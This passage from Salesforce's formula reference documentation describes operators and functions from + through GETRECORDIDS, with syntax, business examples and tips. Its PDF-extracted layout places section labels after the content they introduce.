Use the following operators and functions when building formulas. Click on the name of the operator or function below to
view more details. All functions are available everywhere that you can include a formula such as formula fields, validation rules,
approval processes, and workflow rules, unless otherwise specified.

Note:  Extraneous spaces in the samples below are ignored.

Math Operators

DescriptionOperator

Calculates the sum of two values.+ (Add)

Calculates the difference of two values.- (Subtract)

Multiplies its values.* (Multiply)

Divides its values./ (Divide)

Raises a number to a power of a specified number.^ (Exponentiation)

Specifies that the expressions within the open parenthesis and close parenthesis are evaluated
first. All other expressions are evaluated using standard operator precedence.

() (Open Parenthesis and
Close Parenthesis)

Logical Operators

DescriptionOperator

Evaluates if two values are equivalent.= and == (Equal)

Evaluates if two values are not equivalent.<> and != (Not Equal)

Evaluates if a value is less than the value that follows this symbol.< (Less Than)

Evaluates if a value is greater than the value that follows this symbol.> (Greater Than)

Evaluates if a value is less than or equal to the value that follows this symbol.<= (Less Than or Equal)

Evaluates if a value is greater than or equal to the value that follows this symbol.>= (Greater Than or
Equal)

Evaluates if two values or expressions are both true. Use this operator as an alternative to the
logical function AND.

&& (AND)
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DescriptionOperator

Evaluates if at least one of multiple values or expressions is true. Use this operator as an alternative
to the logical function OR.

|| (OR)

Text Operators

DescriptionOperator

Connects two or more strings.& (Concatenate)

Date and Time Functions

DescriptionFunction

Returns a date value from year, month, and day values you enter. Salesforce displays an error on
the detail page if the value of the DATE function in a formula field is an invalid date, such as
February 29 in a non-leap year.

DATE

Returns a date value for a date/time or text expression.DATEVALUE

Returns a year, month, day and GMT time value.DATETIMEVALUE

Returns a day of the month in the form of a number between 1 and 31.DAY

Returns the month, a number between 1 (January) and 12 (December) in number format of a
given date.

MONTH

Returns a date/time representing the current moment.NOW

Returns the current date as a date data type.TODAY

Returns the four-digit year in number format of a given date.YEAR

Informational Functions

DescriptionFunction

Determines if an expression has a value and returns a substitute expression if it does not. If the
expression has a value, returns the value of the expression.

BLANKVALUE

Determines if an expression has a value and returns TRUE if it does not. If it contains a value,
this function returns FALSE.

ISBLANK

Determines if an expression is null (blank) and returns TRUE if it is. If it contains a value, this
function returns FALSE.

ISNULL

Important: Use ISBLANK instead of ISNULL in new formulas. ISBLANK has the
same functionality as ISNULL, but also supports text fields. Salesforce will continue to
support ISNULL, so you do not need to change any existing formulas.
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DescriptionFunction

Determines if an expression is null (blank) and returns a substitute expression if it is. If the
expression is not blank, returns the value of the expression.

NULLVALUE

Important: Use BLANKVALUE instead of NULLVALUE in new formulas.
BLANKVALUE has the same functionality as NULLVALUE, but also supports text
fields. Salesforce will continue to support NULLVALUE, so you do not need to change
existing formulas.

Returns the previous value of a field.PRIORVALUE

Logical Functions

DescriptionFunction

Returns a TRUE response if all values are true; returns a FALSE response if one or more values
are false.

AND

Checks a given expression against a series of values. If the expression is equal to a value, returns
the corresponding result. If it is not equal to any values, it returns the else_result.

CASE

Determines if expressions are true or false. Returns a given value if true and another value if false.IF

Compares the value of a field to the previous value and returns TRUE if the values are different.
If the values are the same, this function returns FALSE.

ISCHANGED

Checks if the formula is running during the creation of a new record and returns TRUE if it is.
If an existing record is being updated, this function returns FALSE.

ISNEW

Determines if a text value is a number and returns TRUE if it is. Otherwise, it returns FALSE.ISNUMBER

Returns FALSE for TRUE and TRUE for FALSE.NOT

Determines if expressions are true or false. Returns TRUE if any expression is true. Returns
FALSE if all expressions are false.

OR

Math Functions

DescriptionFunction

Calculates the absolute value of a number. The absolute value of a number is the number without
its positive or negative sign.

ABS

Rounds a number up to the nearest integer.CEILING

Calculates the distance between two locations in miles or kilometers.DISTANCE

Returns a value for e raised to the power of a number you specify.EXP

Returns a number rounded down to the nearest integer.FLOOR

Returns a geolocation based on the provided latitude and longitude. Must be used with the
DISTANCE function.

GEOLOCATION

Returns the natural logarithm of a specified number. Natural logarithms are based on the constant
e value of 2.71828182845904.

LN
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DescriptionFunction

Returns the base 10 logarithm of a number.LOG

Returns the highest number from a list of numbers.MAX

Returns the lowest number from a list of numbers.MIN

Returns a remainder after a number is divided by a specified divisor.MOD

Returns the nearest number to a number you specify, constraining the new number by a specified
number of digits.

ROUND

Returns the positive square root of a given number.SQRT

Text Functions

DescriptionFunction

Determines if text begins with specific characters and returns TRUE if it does. Returns FALSE
if it does not.

BEGINS

Inserts a line break in a string of text.BR

Converts a 15-character ID to a case-insensitive 18-character ID.CASESAFEID

Compares two arguments of text and returns TRUE if the first argument contains the second
argument. If not, returns FALSE.

CONTAINS

Returns the position of a string within a string of text represented as a number.FIND

Returns the user’s session ID.GETSESSIONID

Creates a link to a URL specified that is linkable from the text specified.HYPERLINK

Inserts an image with alternate text and height/width specifications.IMAGE

Determines if any value selected in a multi-select picklist field equals a text literal you specify.INCLUDES

Determines if the value of a picklist field is equal to a text literal you specify.ISPICKVAL

Returns the specified number of characters from the beginning of a text string.LEFT

Returns the number of characters in a specified text string.LEN

Converts all letters in the specified text string to lowercase. Any characters that are not letters
are unaffected by this function. Locale rules are applied if a locale is provided.

LOWER

Inserts characters you specify to the left-side of a text string.LPAD

Returns the specified number of characters from the middle of a text string given the starting
position.

MID

Returns the specified number of characters from the end of a text string.RIGHT

Inserts characters that you specify to the right-side of a text string.RPAD

Substitutes new text for old text in a text string.SUBSTITUTE

Converts a percent, number, date, date/time, or currency type field into text anywhere formulas
are used. Also, converts picklist values to text in validation rules, formula fields, and field updates.

TEXT

Removes the spaces and tabs from the beginning and end of a text string.TRIM
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DescriptionFunction

Converts all letters in the specified text string to uppercase. Any characters that are not letters
are unaffected by this function. Locale rules are applied if a locale is provided.

UPPER

Converts a text string to a number.VALUE

Summary Functions

The following functions are available with summary, matrix, and joined reports.

DescriptionFunction

This function returns the value of a specified parent grouping. A “parent” grouping is any level
above the one containing the formula. You can only use this function in custom summary formulas
for reports.

PARENTGROUPVAL

This function returns the value of a specified previous grouping. A “previous” grouping is one
that comes before the current grouping in the report. Choose the grouping level and increment.

PREVGROUPVAL

The increment is the number of columns or rows before the current summary. The default is 1;
the maximum is 12. You can only use this function in custom summary formulas for reports.

Advanced Functions

DescriptionFunction

Returns an array of strings in the form of record IDs for the selected records in a list, such as a
list view or related list.

GETRECORDIDS

Returns content from an s-control snippet. Use this function to reuse common code in many
s-controls.

INCLUDE

Returns a relative URL in the form of a link (href and anchor tags) for a custom s-control or
Salesforce page.

LINKTO

Compares a text field to a regular expression and returns TRUE if there is a match. Otherwise,
it returns FALSE. A regular expression is a string used to describe a format of a string according
to certain syntax rules.

REGEX

Returns a script tag with source for a URL you specify. Use this function when referencing the
Force.com AJAX Toolkit or other JavaScript toolkits.

REQUIRESCRIPT

Returns a relative URL for an action, s-control, Visualforce page, or a file in a static resource
archive in a Visualforce page.

URLFOR

Returns a value by looking up a related value on a custom object similar to the VLOOKUP()
Excel function.

VLOOKUP

Encoding Functions

DescriptionFunction

Encodes text and merge field values for use in HTML by replacing characters that are reserved
in HTML, such as the greater-than sign (>), with HTML entity equivalents, such as &gt;.

HTMLENCODE
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DescriptionFunction

Encodes text and merge field values for use in JavaScript by inserting escape characters, such as
a backslash (\), before unsafe JavaScript characters, such as the apostrophe (').

JSENCODE

Encodes text and merge field values for use in JavaScript within HTML tags by inserting escape
characters before unsafe JavaScript characters and replacing characters that are reserved in HTML
with HTML entity equivalents.

JSINHTMLENCODE

Encodes text and merge field values for use in URLs by replacing characters that are illegal in
URLs, such as blank spaces, with the code that represent those characters as defined in RFC

URLENCODE

3986, Uniform Resource Identifier (URI): Generic Syntax. For example, blank spaces are replaced
with %20, and exclamation points are replaced with %21.

See Also:
Operators and Functions A – H
Operators and Functions I – Z
Examples of Advanced Formula Fields

Operators and Functions A – H
Use the following operators and functions when building formulas. Click on the name of the operator or function below to
view more details. All functions are available everywhere that you can include a formula such as formula fields, validation rules,
approval processes, and workflow rules, unless otherwise specified.

Note:  Extraneous spaces in the samples below are ignored.

+ (Add)

Calculates the sum of two values.Description:

value1 + value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

Amount + Maint_Amount__c + Services_Amount__c

This formula calculates the sum of the product Amount, maintenance amount, and services
fees. Note that Maint amount and Service Fees are custom currency fields.

Formula Field Example:

EMAIL_OPT_OUT:SUM + DO_NOT_CALL:SUM calculates all Email Opt Out fields plus
all Do Not Call fields on the leads in your report. This formula is a number data type that
returns a positive integer.

Report Example:

You may have a custom object that allows users to track the total number of hours worked
in a week. Use the following example to ensure that users cannot save a time card record with
more than 40 hours in a work week.
Monday_Hours__c +
Tuesday_Hours__c +

Validation Rule Example:
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Wednesday_Hours__c +
Thursday_Hours__c +
Friday_Hours__c > 40

Use a formula like this one in a validation rule to display the following error message when
the total number of hours entered for each work day is greater than 40: “Your total hours
cannot exceed 40.” This example requires five custom fields on your custom object, one for
each day of work.

- (Subtract)

Calculates the difference of two values.Description:

value1 - value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

Amount - Discount_Amount__c

This formula calculates the difference of the product Amount less the Discount Amount.
Note that Discount Amount is a custom currency field.

Example:

AMOUNT:SUM - Product.Discount_Amount__c:SUM calculates the difference of all
Amount fields and all Discounted Amount custom fields on the products in your report.
This formula is a currency data type that returns a currency sign and decimal places.

Report Example:

* (Multiply)

Multiplies its values.Description:

value1 * value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

Consulting_Days__c * 1200

This formula calculates the number of consulting days times 1200 given that this formula
field is a currency data type and consulting charges a rate of $1200 per day. Note that
Consulting Days is a custom field.

Example:

RowCount * AGE:AVG calculates the record count times the average age value of your
report. This formula is a number data type that returns a positive or negative integer or
decimal.

Report Example:

/ (Divide)

Divides its values.Description:

value1 / value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:
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AnnualRevenue/ NumberOfEmployees

This formula calculates the revenue amount per employee using a currency field.

IF(NumberOfOpportunities > 0,
NumberOfWonOpportunities / NumberOfOpportunities, null)

Example:

This formula calculates the win rate of opportunities on a campaign.

% Won Opportunities

WON:SUM / RowCount calculates the percent of Won opportunities using a record count
representing the number of all opportunities in your report. This formula is a number data
type that returns a positive or negative integer.

Report Example:

% Difference between Cost and Sales Price

(TOTAL_PRICE:SUM - QUANTITY:SUM * Product2.Cost__c:SUM) /
(QUANTITY:SUM * Product2.Cost__c:SUM) calculates the average percent difference
between what a product costs and its selling price on a product-by-product level. Note that
Product2.Cost__c:SUM is a custom currency field named Cost on products, which
includes the cost of each product. This formula is a percent data type that returns a positive
or negative integer. For best results, use this on a summary Opportunities with Products
report that is summarized by Product Name and includes summary totals for Quantity,
Total Price, and Cost.

^ (Exponentiation)

Raises a number to a power of a specified number.Description:

number^integer and replace number with a merge field, expression, or another numeric
value; replace integer with a merge field that contains an integer, expression, or any integer.

Use:

NumberOfEmployees^4 calculates the number of employees to the 4th power.Example:

ACTIVE:SUM ^ 2 calculates the number of active Salesforce users to the 2nd power for
administration. This formula is a number data type that returns a positive integer.

Report Example:

Avoid replacing integer with a negative number.Tips:

() (Open Parenthesis and Close Parenthesis)

Specifies that the expressions within the open parenthesis and close parenthesis are evaluated
first. All other expressions are evaluated using standard operator precedence.

Description:

(expression1) expression2... and replace each expression with merge fields,
expressions, or other numeric values.

Use:

(Unit_Value__c - Old_Value__c) / New_Value__c  calculates the difference
between the old value and new valuedivided by the new value.

Example:

(DURATIONHOURS:SUM * RowCount) / 24 calculates the duration of all event times
the record count per 24 hours. This formula is a percent data type that returns a positive or
negative integer or decimal, representing what percent of a day is spent on events.

Report Example:

3044

Formula Operators and FunctionsEnhancing Your Objects, Data, and Fields



= and == (Equal)

Important:  Don’t use this function for a null comparison, such as MyDateTime__c == null. Use ISBLANK
instead.

Evaluates if two values are equivalent.Description:

expression1=expression2 or expression1 == expression2, and replace each
expression with merge fields, expressions, or other numeric values.

Use:

Due Date

Due Date = CreatedDate + 5 assigns a due date that is five days past the create date.

Example:

Commission Amount

IF(Probability =1, ROUND(Amount*0.02, 2), 0)

This formula calculates the 2% commission amount of an opportunity that has a probability
of 100%. All other opportunities will have a commission value of 0.

Possible results:

• An opportunity with a Probability of 90% will have a commission of 0.
• An opportunity with a Probability of 100% and an Amount of $100,000 will have a

commission of $2,000.

<> and != (Not Equal)

Important:  Don’t use this function for a null comparison, such as MyDateTime__c != null. Use ISBLANK
instead.

Evaluates if two values are not equivalent.Description:

expression1 <> expression2 or expression1 != expression2, and replace each
expression with merge fields, expressions, or other numeric values.

Use:

IF(Maint_Amount__c + Services_Amount__c<> Amount,
"DISCOUNTED", "FULL PRICE")

Example:

This formula displays “DISCOUNTED” on product if its maintenance amount and services
amount do not equal the product amount. Otherwise, displays “FULL PRICE.” Note that
this example uses two custom currency fields for Maint Amount and Services Amount.

< (Less Than)

Evaluates if a value is less than the value that follows this symbol.Description:

value1 < value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

IF(AnnualRevenue < 1000000, 1, 2) assigns the value “1” with revenues less than
one million and the value “2” to revenues greater than one million.

Example:
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> (Greater Than)

Evaluates if a value is greater than the value that follows this symbol.Description:

value1 > value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

IF(commission__c > 1000000, "High Net Worth", "General") assigns the
“High Net Worth” value to a commission greater than one million. Note, this is a text formula
field that uses a commission custom field.

Example:

<= (Less Than or Equal)

Evaluates if a value is less than or equal to the value that follows this symbol.Description:

value1 <= value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

IF(AnnualRevenue <= 1000000, 1, 2) assigns the value “1” with revenues less than
or equal to one million and the value “2” with revenues greater than one million.

Example:

>= (Greater Than or Equal)

Evaluates if a value is greater than or equal to the value that follows this symbol.Description:

value1 >= value2 and replace each value with merge fields, expressions, or other numeric
values.

Use:

IF(Commission__c >= 1000000, "YES", "NO") assigns the “YES” value with a
commission greater than or equal to one million. Note, this is a text formula field that uses
a custom currency field called Commission.

Example:

&& (AND)

Evaluates if two values or expressions are both true. Use this operator as an alternative to the
logical function AND.

Description:

(logical1) && (logical2) and replace logical1 and logical2 with the values or
expressions that you want evaluated.

Use:

IF((Price<100 && Quantity<5),"Small", null)

This formula displays “Small” if the price is less than 100 and quantity is less than five.
Otherwise, this field is blank.

Example:

|| (OR)

Evaluates if at least one of multiple values or expressions is true. Use this operator as an
alternative to the logical function OR.

Description:

(logical1) || (logical2) and replace any number of logical references with the values
or expressions you want evaluated.

Use:

3046

Formula Operators and FunctionsEnhancing Your Objects, Data, and Fields



IF((ISPICKVAL(Priority, "High")) || (ISPICKVAL(Status , "New")),
ROUND(NOW()-CreatedDate, 0), null)

This formula returns the number of days a case has been open if the Status is new or the
Priority is high. If the case was opened today, this field displays a zero.

Example:

(Discount_Rate__c < 0) || (Discount_Rate__c > 0.40)Validation Rule Example:

This validation rule formula displays the following error message when the Discount Rate
custom field is not between 0 and 40%: "Discount Rate cannot exceed 40%."

& (Concatenate)

Connects two or more strings.Description:

string1&string2 and replace each string with merge fields, expressions, or other values.Use:

"Expense-" & Trip_Name__c & "-" & ExpenseNum__c

This formula displays the text “Expense-” followed by trip name and the expense number.
This is a text formula field that uses an expense number custom field.

Example:

ABS

Calculates the absolute value of a number. The absolute value of a number is the number
without its positive or negative sign.

Description:

ABS(number) and replace number with a merge field, expression, or other numeric value
that has the sign you want removed.

Use:

ABS(ExpectedRevenue) calculates the positive value of the Expected Revenue amount
regardless of whether it is positive or negative.

Example:

AND

Returns a TRUE response if all values are true; returns a FALSE response if one or more
values are false. Use this function as an alternative to the operator  && (AND).

Description:

AND(logical1,logical2,...) and replace logical1,logical2,... with the values
that you want evaluated.

Use:

IF(AND(Price<1,Quantity<1),"Small", null)

This formula displays “Small” if the price and quantity are less than one. This field is blank
if the asset has a price or quantity greater than one.

Formula Field Example:

BEGINS

Determines if text begins with specific characters and returns TRUE if it does. Returns
FALSE if it does not.

Description:
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BEGINS(text, compare_text) and replace text, compare_text with the characters
or fields you want to compare.

Use:

IF(BEGINS (Product_type__c, "ICU"), "Medical", "Technical")

This example returns the text “Medical” if the text in any Product Type custom text field
begins with “ICU.” For all other products, it displays “Technical.”

Example:

Tips: • This function is case sensitive so be sure your compare_text value has the correct
capitalization.

• When using this function in a validation rule or workflow rule, fields that are blank are
considered valid. For example, if you have a validation rule that tests to see if the serial
number of an asset begins with “3,” all assets that have a blank serial number are considered
valid.

BLANKVALUE

Determines if an expression has a value and returns a substitute expression if it does not. If
the expression has a value, returns the value of the expression.

Description:

BLANKVALUE(expression, substitute_expression) and replace expression with
the expression you want evaluated; replace substitute_expression with the value you
want to replace any blank values.

Use:

Example 1

BLANKVALUE(Department, “Undesignated”)

Example:

This formula returns the value of the Department field if the Department field contains
a value. If the Department field is empty, this formula returns the word Undesignated.

Example 2

(BLANKVALUE(Payment_Due_Date__c, StartDate +5)

This formula returns the date five days after the contract start date whenever Payment Due
Date is blank. Payment Due Date is a custom date field.

Tips: • Use BLANKVALUE instead of NULLVALUE in new formulas. BLANKVALUE has
the same functionality as NULLVALUE, but also supports text fields. Salesforce will
continue to support NULLVALUE, so you do not need to change existing formulas.

• A field is not empty if it contains a character, blank space, or zero. For example, a field
that contains a space inserted with the spacebar is not empty.

• Use the BLANKVALUE function to return a specified string if the field does not have
a value; use the ISBLANK function if you only want to check if the field has a value.

• If you use this function with a numeric field, the function only returns the specified string
if the field does not have a value and is not configured to treat blank fields as zeroes.

BR

Inserts a line break in a string of text.Description:

BR()Use:
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CASE(ShippingCountry,
"USA",

Example:

ShippingStreet & BR() &
ShippingCity & ",
" & ShippingState & " " &
ShippingPostalCode & BR()
& ShippingCountry,

"France",
ShippingStreet & BR() &
ShippingPostalCode & " " &
ShippingCity & BR() &
ShippingCountry, "etc")

This formula field displays a formatted mailing address for a contact in standard format,
including spaces and line breaks where appropriate depending on the country.

Tips: • Do not remove the parentheses after the function name.
• Keep the parentheses empty. They do not need to contain a value.
• Remember to surround the BR() with concatenation operators: &.
• Avoid using this function in mail merge templates.
• This function is not available in custom buttons and links, s-controls, or reports.

CASE

Checks a given expression against a series of values. If the expression is equal to a value,
returns the corresponding result. If it is not equal to any values, it returns the else_result.

Description:

CASE(expression,value1, result1, value2, result2,..., else_result)
and replace expression with the field or value you want compared to each specified value.

Use:

Replace each value and result with the value that must be equivalent to return the result entry.
Replace else_result with the value you want returned when the expression does not equal
any values.

Days Open for Cases

Use this example of a custom formula field called Days Open to display different text
depending on the number of days a case has been open:

CASE(Days_Open__c, 3,
"Reassign", 2, "Assign Task", "Maintain")

Formula Field Example:

The following text is displayed:

• “Reassign” for any case open three days.
• “Assign Task” for any case open two days.
• “Maintain” for all other cases.

Last Activity Month

This formula field displays the month of the last activity or “None” if there are no activities.

CASE(MONTH(LastActivityDate),
1, "January",
2, "February",
3, "March",
4, "April",
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5, "May",
6, "June",
7, "July",
8, "August",
9, "September",
10, "October",
11, "November",
12, "December",
"None")

Discount Rate

Use the following default value formula to insert a different discount rate on an opportunity
based on the department of the person creating the opportunity:

CASE(User.Department, "IT", 0.25, "Field", 0.15, 0)

Default Value Example:

In this example, the formula inserts a discount rate of 25% on any opportunity created by a
user in the “IT” department or 15% on any opportunity created by someone in the “Field”
department. A zero is applied if the creator does not belong to either of these departments.
This is a custom percent field on opportunities that uses the standard user field Department.

Product Language

You may want to associate a product with its language so that your users know the type of
documentation or adapter to include. Use the following default value formula to automatically
set the language of a product based on the country of the user creating the product. In this
example, the default value is “Japanese” if the user's country is “Japan” and “English” if the
user's country is “US.” If neither is true, the default value “unknown” is inserted into the
Product Language field.

CASE($User.Country , "Japan", "Japanese", "US", "English","unknown")

Tips: • Be sure your value1, value2... expressions are the same data type.
• Be sure your result1, result2... expressions are the same data type.
• CASE functions cannot contain functions that return true or false. Instead, make true

or false expressions return numbers such as:

CASE(1, IF(ISPICKVAL (Term__c, "12"), 1, 0),
12 * Monthly_Commit__c,
IF(ISPICKVAL(Term__c, "24"), 1, 0),
24 * Monthly_Commit__c, 0)

In this formula, Term is a picklist field that is multiplied by the Monthly Commit
whenever it contains the value 1 for true.

• The else_result value is required.
• CASE functions return an error whenever any of the expressions return an error, regardless

of which one should be returned. For example, CASE(Field__c,"Partner", "P",
"Customer", "C", LEFT(Field__c, -5)) returns an error even if the value of
the field is “Partner” or “Customer” because the last statement is illogical.

• If the field in your CASE function is blank, it returns your else_result value. For
example, this formula: CASE(Days_Open__c, 3, "Reassign", 2, "Assign
Task", "Maintain") displays “Maintain” if the Days Open field is blank, 0, or any
value other than 2 or 3.
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• Use CASE functions to determine if a picklist value is equal to a particular value. For
example the formula CASE(Term__c, "12", 12 * Monthly_Commit__c, "24",
24 * Monthly_Commit__c, 0) multiplies the Monthly Commit amount by 12
whenever the Term is 12 or multiplies the Monthly Commit amount by 24 whenever
the Term is 24. Otherwise, the result is zero.

CASESAFEID

Converts a 15-character ID to a case-insensitive 18-character ID.Description:

CASESAFEID(id) and replace id with the object’s ID.Use:

CASESAFEID (Id)Example:

This formula replaces the 15-character ID with the 18-character, case-insensitive ID.

Tips: • Convert to 18-character IDs for better compatibility with Excel.
• The CASESAFEID function is available everywhere that you can define a formula except

reports and s-controls.

CEILING

Rounds a number up to the nearest integer.Description:

CEILING(number) and replace number with the field or expression you want rounded.Use:

Rounding Up (literal value)

CEILING(2.5)

Example:

This formula returns 3, which is 2.5 rounded up to the nearest number.

Earthquake Magnitude
CEILING(Magnitude__c) returns the value of a formula number field that calculates the
magnitude of an earthquake up to the nearest integer.

CONTAINS

Compares two arguments of text and returns TRUE if the first argument contains the second
argument. If not, returns FALSE.

Description:

CONTAINS(text, compare_text) and replace text with the text that contains the value
of compare_text.

Use:

IF(CONTAINS(Product_Type__c, "part"), "Parts", "Service")Example:

This formula checks the content of a custom text field named Product_Type and returns
“Parts” for any product with the word “part” in it. Otherwise, it returns “Service.” Note that
the values are case sensitive, so if a Product_Type field contains the text “Part” or “PART,”
this formula returns “Services.”
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Tips: • This function is case sensitive so be sure your compare_text value has the correct
capitalization.

• When using this function in a validation rule or workflow rule, fields that are blank are
considered valid. For example, if you have a validation rule that tests to see if the serial
number of an asset contains “A,” all assets that have a blank serial number are considered
valid.

• The CONTAINS function does not support multi-select picklists. Use INCLUDES to
see if a multi-select picklist has a specific value.

DATE

Returns a date value from year, month, and day values you enter. Salesforce displays an error
on the detail page if the value of the DATE function in a formula field is an invalid date,
such as February 29 in a non-leap year.

Description:

DATE(year,month,day) and replace year with a four-digit year, month with a two-digit
month, and day with a two-digit day.

Use:

DATE(2005, 01, 02) creates a date field of January 2, 2005.Example:

DATEVALUE

Returns a date value for a date/time or text expression.Description:

DATEVALUE(expression) and replace expression with a date/time or text value, merge
field, or expression.

Use:

Closed Date

DATEVALUE(ClosedDate) displays a date field based on the value of the Date/Time
Closed field.

Example:

Date Value

DATEVALUE("2005-11-15") returns November 15, 2005 as a date value.

Tips: • If the field referenced in the function is not a valid text or date/time field, the formula
field displays #ERROR!

• When entering a date, surround the date with quotes and use the following format:
YYYY-MM-DD, that is, a four-digit year, two-digit month, and two-digit day.

• If the expression does not match valid date ranges, such as the MM is not between
01 and 12, the formula field displays #ERROR!

• Dates and times are always calculated using the user’s time zone.

DATETIMEVALUE

Returns a year, month, day and GMT time value.Description:

DATETIMEVALUE(expression) and replace expression with a date/time or text value,
merge field, or expression.

Use:
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Closed Date

DATETIMEVALUE(ClosedDate) displays a date field based on the value of the Date/Time
Closed field.

Example:

Date Value

DATETIMEVALUE("2005-11-15 17:00:00") returns November 15, 2005 5:00 PM
GMT as a date and time value.

Tips: • DATETIMEVALUE is always calculated using GMT time zone and can’t be changed.
• When entering a specific date, surround the date with quotes and use the following format:

YYYY-MM-DD, that is, a four-digit year, two-digit month, and two-digit day.
• If the expression does not match valid date ranges, such as the MM is not between

01 and 12, the formula field displays #ERROR!

DAY

Returns a day of the month in the form of a number between 1 and 31.Description:

DAY(date) and replace date with a date field or value such as TODAY().Use:

DAY(Code_Freeze__c) returns the day in your custom code freeze date. Note this does
not work on date/time fields.

Example:

DISTANCE

Calculates the distance between two locations in miles or kilometers.Description:

DISTANCE(mylocation1, mylocation2, “unit”) and replace mylocation1 and
mylocation2 with the two location fields or any value returned by the GEOLOCATION
function that you want to compare. Replace unit with mi (miles) or km (kilometers).

Use:

Distance between two geolocation fieldsExamples:

DISTANCE(warehouse_location__c, store_location__c, “mi”)

This formula returns the distance, in miles, between the warehouse and the store. In this
example, warehouse_location__c and store_location__c are the names of two
custom geolocation fields.

Distance between a custom geolocation field and fixed coordinates
DISTANCE(warehouse_location__c, GEOLOCATION(37.775,-122.418), “km”)

This formula returns the distance, in kilometers, between the warehouse and the known
latitude and longitude 37.775°, –122.418° (San Francisco).

Distances with conditions
IF(DISTANCE(warehouse_location__c, store_location__c, “mi”)<10,
“Near”, “Far”)

This formula updates a text formula field to Near if the distance between the warehouse
and the store is less than 10 miles. Otherwise, it updates the text field to Far.
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Tip:  Although DISTANCE can be calculated in miles or kilometers, the unit is
not returned in the calculation. If possible, include the unit of measure in the name
of your distance formula field, so users know whether the distance is in miles or
kilometers.

Tips:
Note: The DISTANCE and GEOLOCATION formula functions are in beta
release. See Geolocation Custom Field Overview—Beta on page 2932 for more
information.

• The DISTANCE function returns a number data type.
• The DISTANCE function is available only with formula fields and Visual Workflow.

To use it with validation rules or in reports, set up the formula field first, and reference
the field in the rule or report.

• The DISTANCE function is not available in workflow rules and approval processes.
• DISTANCE is the only formula function that can use GEOLOCATION parameters.
• Distance is always calculated in decimals, even if you’re displaying the geolocation notation

in degrees, minutes, and seconds in the user interface. Specify the number of Decimal
Places in the custom field setup wizard.

• DISTANCE only supports the logical operators > and <, returning values within (<) or
beyond (>) a specified radius.

• Distance is calculated as a straight line—as the crow flies—regardless of geography and
topography between the two points.

EXP

Returns a value for e raised to the power of a number you specify.Description:

EXP(number) and replace number with a number field or value such as 5.Use:

Exponent of a Literal Value

EXP(3)

Example:

This formula returns the value of e to the third power.

Compound Interest

Principal__c * EXP(Rate__c * Years__c)

This formula calculates the compound interest based on a custom currency field for principal,
custom percent field for rate, and custom number field for years.

FIND

Returns the position of a string within a string of text represented as a number.Description:

FIND(search_text, text[, start_num]) and replace search_text with the string
you want to find, replace text with the field or expression you want to search, and replace

Use:

start_num with the number of the character from which to start searching from left to
right.
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Street Address

FIND(" ", Street) returns the character position of the first space in the Street field.
You can use this number to find out the length of the street address as a means of separating
a street address from street name in an address field.

Example:

Deriving Website Addresses

SUBSTITUTE(Email, LEFT(Email, FIND("@", Email)), "www.") finds the
location of the @ sign in a person's email address to determine the length of text to replace
with a “www.” as a means of deriving their website address.

Tips: • Be sure to remove the brackets, [ and ], from your formula before validating it.
• If the field referenced in your text parameter is blank, the formula field displays 0.
• Your search_text parameter is case sensitive and cannot contain any wildcard characters.
• If your search does not return any results, a 0 displays in the field.
• The start_num parameter is optional. If you do not enter a start_num value, the

formula uses the value one, or the first character in the string.
• If your start_num is not greater than zero, a 0 displays in the field.
• If your start_num is greater than the length of the text, a 0 displays in the field.
• When entering your start_num parameter, remember that some fields like the Website

field are unique because a “http://” is automatically appended to the beginning of the text
you enter.

• Note that the first character in a string is designated as one rather than zero.

FLOOR

Returns a number rounded down to the nearest integer.Description:

FLOOR(number) and replace number with a number field or value such as 5.245.Use:

Commission Amounts

FLOOR(commission__c) rounds commission down to the nearest integer.

Example:

Contact's Age
FLOOR((TODAY()-Birthdate)/365.2425)

Use this formula to calculate a person’s age based on a standard field called Birthdate. The
person’s Birthdate is subtracted from today’s date, which returns the number of days since
the person’s Birthdate. This number is divided by the number of days in a year and rounded
down to the nearest integer.

GEOLOCATION

Returns a geolocation based on the provided latitude and longitude. Must be used with the
DISTANCE function.

Description:

GEOLOCATION(latitude, longitude, “unit”) and replace latitude and longitude
with the corresponding geolocation, numerical code values. Replace unit with mi (miles)
or km (kilometers).

Use:
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Distance between two geolocation fieldsExamples:

DISTANCE(warehouse_location__c, store_location__c, “mi”)

This formula returns the distance, in miles, between the warehouse and the store. In this
example, warehouse_location__c and store_location__c are the names of two
custom geolocation fields.

Distance between a custom geolocation field and fixed coordinates
DISTANCE(warehouse_location__c, GEOLOCATION(37.775,-122.418), “km”)

This formula returns the distance, in kilometers, between the warehouse and the known
latitude and longitude 37.775°, –122.418° (San Francisco).

Tips:
Note: The DISTANCE and GEOLOCATION formula functions are in beta
release. See Geolocation Custom Field Overview—Beta on page 2932 for more
information.

• The GEOLOCATION function returns a location data type that can be used only by,
and must be used with, the DISTANCE function. The GEOLOCATION function
does not work on its own.

• When using the GEOLOCATION function, the geolocation field must precede the
latitude and longitude coordinates. For example,
DISTANCE(warehouse_location__c, GEOLOCATION(37.775,-122.418),
“km”) works but DISTANCE(GEOLOCATION(37.775,-122.418),
warehouse_location__c, “km”) doesn’t work.

GETRECORDIDS

Returns an array of strings in the form of record IDs for the selected records in a list, such
as a list view or related list.

Description:

{!GETRECORDIDS(object_type)} and replace object_type with a reference to the
custom or standard object for the records you want to retrieve.

Use:

{!REQUIRESCRIPT ("/soap/ajax/13.0/connection.js")} var records =
{!GETRECORDIDS($ObjectType.Sample)}; var

Custom Button Example:

newRecords = []; if (records[0] == null) { alert("Please select at
least one row") } else {

for (var n=0; n<records.length; n++) { var c =
new sforce.SObject("Case"); c.id = records[n]; c.Status = "New";

newRecords.push(c); } result =
sforce.connection.update(newRecords); window.location.reload(); }

In this example, all selected case records are updated with a Status of “New.” To set this
up in your organization, create a custom list button for cases with the following attributes:

• Display Type is “List Button”
• Behavior is “Execute JavaScript”
• Content Source is “OnClick JavaScript”

Paste the sample code above into the content of your custom button. Finally, add the list
button to the a page layout that contains the Cases related list, such as accounts or
opportunities. Users can select any number of cases in the related list and click the list button
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to change the status of those cases at once. Notice the check for records[0] == null,
which displays a message to users when they do not select at least one record in the list.

Tips: • Use global variables to access special merge fields for s-controls, custom buttons, and
links.

• Activities are special types of objects. Use {!GETRECORDIDS($ObjectType.Task)}
